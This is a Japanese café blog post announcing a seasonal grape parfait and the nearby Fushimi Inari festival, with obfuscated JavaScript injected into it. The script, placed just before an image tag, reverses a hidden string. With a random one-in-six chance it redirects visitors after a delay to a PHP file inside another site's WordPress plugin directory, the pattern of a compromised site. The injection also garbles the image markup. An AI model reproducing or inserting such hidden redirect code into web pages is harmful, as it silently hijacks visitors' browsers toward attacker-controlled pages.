ミッシュハウスからのお知らせ

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);} class=”alignnone size-medium wp-image-1341″ src=”https://www.missu-house.com/wp/wp-content/uploads/2017/09/month_budou01-300×196.jpg” alt=”” width=”300″ height=”196″ />

こんにちは~☆彡Facebookの方はたまに更新していたのですが、こちらはすっごく久しぶりになってしまいました(^^;)

夏はあっという間に終わり、もうすっかり秋ですね~!

隣の伏見稲荷神社のお祭りが明日から開催されまして、毎年この時期なので、その度に秋がきたな~と感じます。

ミッシュハウスのメニューもだんだん秋~冬モードに替わります^^

今月の月替わりパフェは「ぶどうパフェ」です。

ブドウのジュレとカルピスプリン、ぶどうアイスの優しい味がすべて合わさるととっても美味しいです~♪

旬の葡萄をのせた秋の人気パフェです★

みなさん、少し寒いかもしれませんが、まだまだアイスのシーズン楽しんでいきましょう~(^v^)

 

コメントは利用できません。